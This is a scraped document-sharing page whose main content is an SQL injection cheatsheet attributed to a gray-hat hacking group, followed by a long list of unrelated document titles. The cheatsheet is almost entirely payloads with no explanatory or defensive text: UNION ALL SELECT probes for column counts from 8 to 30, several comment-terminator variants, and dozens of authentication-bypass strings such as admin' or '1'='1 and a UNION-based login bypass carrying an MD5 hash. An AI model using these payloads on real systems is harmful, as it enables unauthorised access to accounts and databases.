UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29–

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30–

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#

UNION ALL SELECT ‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#

UNION ALL SELECT

‘INJ’||’ECT’||’XXX’,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5#

SQL Injection Cheatsheet Auth Bypass Payloads

‘-‘

‘‘

‘&’

‘^’

‘*’

‘ or ”-‘

‘ or ” ‘
‘ or ”&’

‘ or ”^’

‘ or ”*’

“-”

””

“&”

“^”

“*”

” or “”-”

” or “” ”

” or “”&”

” or “”^”

” or “”*”

or true–

” or true–

‘ or true–

“) or true–

‘) or true–

‘ or ‘x’=’x

‘) or (‘x’)=(‘x

‘)) or ((‘x’))=((‘x

” or “x”=”x
“) or (“x”)=(“x

“)) or ((“x”))=((“x

or 1=1

or 1=1–

or 1=1#

or 1=1/*

admin’ —

admin’ #

admin’/*

admin’ or ‘1’=’1

admin’ or ‘1’=’1′–

admin’ or ‘1’=’1’#

admin’ or ‘1’=’1’/*

admin’or 1=1 or ”=’

admin’ or 1=1

admin’ or 1=1–

admin’ or 1=1#

admin’ or 1=1/*

admin’) or (‘1’=’1

admin’) or (‘1’=’1′–

admin’) or (‘1’=’1’#

admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1

admin’) or ‘1’=’1′–

admin’) or ‘1’=’1’#

admin’) or ‘1’=’1’/*

1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’,

’81dc9bdb52d04dc20036dbd8313ed055

admin” —

admin” #

admin”/*

admin” or “1”=”1

admin” or “1”=”1″–

admin” or “1”=”1″#

admin” or “1”=”1″/*

admin”or 1=1 or “”=”

admin” or 1=1

admin” or 1=1–

admin” or 1=1#

admin” or 1=1/*

admin”) or (“1″=”1

admin”) or (“1″=”1″–

admin”) or (“1″=”1″#

admin”) or (“1″=”1″/*

admin”) or “1”=”1
admin”) or “1”=”1″–

admin”) or “1”=”1″#

admin”) or “1”=”1″/*

1234 ” AND 1=0 UNION ALL SELECT “admin”,

“81dc9bdb52d04dc20036dbd8313ed055

Sources: OWASP, Github, Twitter

Team : GHHC

FB:https://www.facebook.com/groups/grayhathackerscommu
nity

Teligram: https://t.me/GHHCommunity

SQL Injection Complete Guide
No ratings yet
SQL Injection Complete Guide
45 pages
Introduction
No ratings yet
Introduction
5 pages
Task 12
No ratings yet
Task 12
5 pages
SQL, SQL Injection, SQLi Types, Impact and Preventions
No ratings yet
SQL, SQL Injection, SQLi Types, Impact and Preventions
13 pages
SQL Injection CyberSecurity
No ratings yet
SQL Injection CyberSecurity
26 pages
SQL Injection Guide
No ratings yet
SQL Injection Guide
9 pages
SQL Injection
No ratings yet
SQL Injection
21 pages
(CyberSec'24) Lab06 - Student Version
No ratings yet
(CyberSec'24) Lab06 - Student Version
46 pages
Defcon 17 Joseph Mccray Adv SQL Injection
No ratings yet
Defcon 17 Joseph Mccray Adv SQL Injection
72 pages
Advanced SQL Injection Hacking and Guide
No ratings yet
Advanced SQL Injection Hacking and Guide
72 pages
SQL Injection
No ratings yet
SQL Injection
49 pages
SQL Injection
No ratings yet
SQL Injection
22 pages
SQL Injection
No ratings yet
SQL Injection
16 pages
18.1 SQL - Injection
No ratings yet
18.1 SQL - Injection
8 pages
Is Presentation Sqli
No ratings yet
Is Presentation Sqli
23 pages
Burpsuit SQLinjection
No ratings yet
Burpsuit SQLinjection
5 pages
SQL Injection
No ratings yet
SQL Injection
32 pages
Inference Dbms
No ratings yet
Inference Dbms
3 pages
Lab File (4) (It Security)
No ratings yet
Lab File (4) (It Security)
26 pages
Advanced SQL Injection 2
No ratings yet
Advanced SQL Injection 2
56 pages
Week 3 SQL Injection
No ratings yet
Week 3 SQL Injection
7 pages
Bootcamp Project Guidelines SQL Injection
No ratings yet
Bootcamp Project Guidelines SQL Injection
3 pages
Binca Sql-Injection
No ratings yet
Binca Sql-Injection
3 pages
Advanced SQL Injection: Dmitry Evteev (Positive Technologies) Web Application Security Consortium (WASC) Contributor
No ratings yet
Advanced SQL Injection: Dmitry Evteev (Positive Technologies) Web Application Security Consortium (WASC) Contributor
62 pages
Ethical Hacking Unit-3
No ratings yet
Ethical Hacking Unit-3
41 pages
SQL Injection T-WPS Office
No ratings yet
SQL Injection T-WPS Office
3 pages
SQL Injection Techniques Guide
No ratings yet
SQL Injection Techniques Guide
19 pages
Understanding SQL Injection Types
No ratings yet
Understanding SQL Injection Types
2 pages
SQL Injection
No ratings yet
SQL Injection
6 pages
SQL Injection: Description
No ratings yet
SQL Injection: Description
3 pages
SQL Injection: Berserkr
No ratings yet
SQL Injection: Berserkr
7 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
19-An Efficient Technique For SQL Injection Detection and
No ratings yet
19-An Efficient Technique For SQL Injection Detection and
18 pages
SQL Injection
No ratings yet
SQL Injection
9 pages
Assignment MS 681
No ratings yet
Assignment MS 681
12 pages
SQL Injection Report With Images
No ratings yet
SQL Injection Report With Images
7 pages
SQL Regex PDF
No ratings yet
SQL Regex PDF
9 pages
SQL Injection
No ratings yet
SQL Injection
14 pages
SQL Injection for Security Experts
No ratings yet
SQL Injection for Security Experts
13 pages
SQL Injection: Bachelor of Technology
No ratings yet
SQL Injection: Bachelor of Technology
17 pages
Handbook For SQL and SQL Injection PART1 1658256349
No ratings yet
Handbook For SQL and SQL Injection PART1 1658256349
13 pages
SQL Injec
No ratings yet
SQL Injec
37 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
Networks Security SQL Injection
No ratings yet
Networks Security SQL Injection
19 pages
SQLi
No ratings yet
SQLi
7 pages
SQL Injection: Nisa Ali Roll#-22011556089
No ratings yet
SQL Injection: Nisa Ali Roll#-22011556089
20 pages
Analyzing SQL Meta Characters and Preven PDF
No ratings yet
Analyzing SQL Meta Characters and Preven PDF
4 pages
SQL Injection
No ratings yet
SQL Injection
16 pages
Advanced SQL Injection
No ratings yet
Advanced SQL Injection
28 pages
06 - SQL Injection
No ratings yet
06 - SQL Injection
143 pages
SQLMap Essentials
No ratings yet
SQLMap Essentials
55 pages
Database Connectivity With Java: Prativa Nyaupane
No ratings yet
Database Connectivity With Java: Prativa Nyaupane
21 pages
SQL Injection Attack
No ratings yet
SQL Injection Attack
9 pages
SQL Injection
No ratings yet
SQL Injection
5 pages
SQL Injection
No ratings yet
SQL Injection
3 pages
Sylink Replacer
No ratings yet
Sylink Replacer
19 pages
HMA Keys
No ratings yet
HMA Keys
6 pages
Local Media8027226009967479266
No ratings yet
Local Media8027226009967479266
83 pages
Wireshark Ubuntu Installation
No ratings yet
Wireshark Ubuntu Installation
8 pages
ITIL-Service Strategy
100% (1)
ITIL-Service Strategy
11 pages
03 Huawei Cloud Stack Host Security Service (HSS) Lab Guide
No ratings yet
03 Huawei Cloud Stack Host Security Service (HSS) Lab Guide
16 pages
IWCF Assessor & Instructor Form
0% (1)
IWCF Assessor & Instructor Form
5 pages
Parental Consent: Department of Education Iv-A Calabarzon Rizal
No ratings yet
Parental Consent: Department of Education Iv-A Calabarzon Rizal
1 page
OECD Blockchain Primer
No ratings yet
OECD Blockchain Primer
12 pages
Session Tracking Example (Using Urlrewriting and Hidden Form Fields)
No ratings yet
Session Tracking Example (Using Urlrewriting and Hidden Form Fields)
8 pages
How To Fix Nokia 5800 Expired Certificate Error During SIS Installation
No ratings yet
How To Fix Nokia 5800 Expired Certificate Error During SIS Installation
3 pages
Application Acknowledgement - Keam 2022: Office of The Commissioner For Entrance Examinations, Kerala
No ratings yet
Application Acknowledgement - Keam 2022: Office of The Commissioner For Entrance Examinations, Kerala
1 page
Competella Calendar Sync Account in Exchange
No ratings yet
Competella Calendar Sync Account in Exchange
10 pages
CC To BTC Method
No ratings yet
CC To BTC Method
7 pages
Philippine Auditing Practices Statements (PAPS) 1009 Computer Assisted Audit Techniques
No ratings yet
Philippine Auditing Practices Statements (PAPS) 1009 Computer Assisted Audit Techniques
9 pages
140 SP 3100
No ratings yet
140 SP 3100
25 pages
RBH Integra32 Software Manual
No ratings yet
RBH Integra32 Software Manual
161 pages
A Modern Approach To Test Data Management
No ratings yet
A Modern Approach To Test Data Management
9 pages
p62 0x07 Advances in Windows Shellcode by SK
No ratings yet
p62 0x07 Advances in Windows Shellcode by SK
22 pages
Home Security Systems Literature Review
No ratings yet
Home Security Systems Literature Review
11 pages
Design Website Using ASP - Net (C#) - Encrypt Using RSA Algorithm
No ratings yet
Design Website Using ASP - Net (C#) - Encrypt Using RSA Algorithm
18 pages
L E 2 0 Safety Evalution Unit
No ratings yet
L E 2 0 Safety Evalution Unit
63 pages
Case Study 3.4 Acme Ltd.
No ratings yet
Case Study 3.4 Acme Ltd.
2 pages
Data Security for Students
No ratings yet
Data Security for Students
7 pages
Vulnerability Management Process
50% (2)
Vulnerability Management Process
4 pages
E-Store Project Software Requirements Specification
No ratings yet
E-Store Project Software Requirements Specification
14 pages
A1 Level 1
No ratings yet
A1 Level 1
3 pages
Et3451 Mini Project
No ratings yet
Et3451 Mini Project
11 pages
How To Define Crontab
No ratings yet
How To Define Crontab
2 pages
Administration Customer Services (Universal CV Example)
No ratings yet
Administration Customer Services (Universal CV Example)
2 pages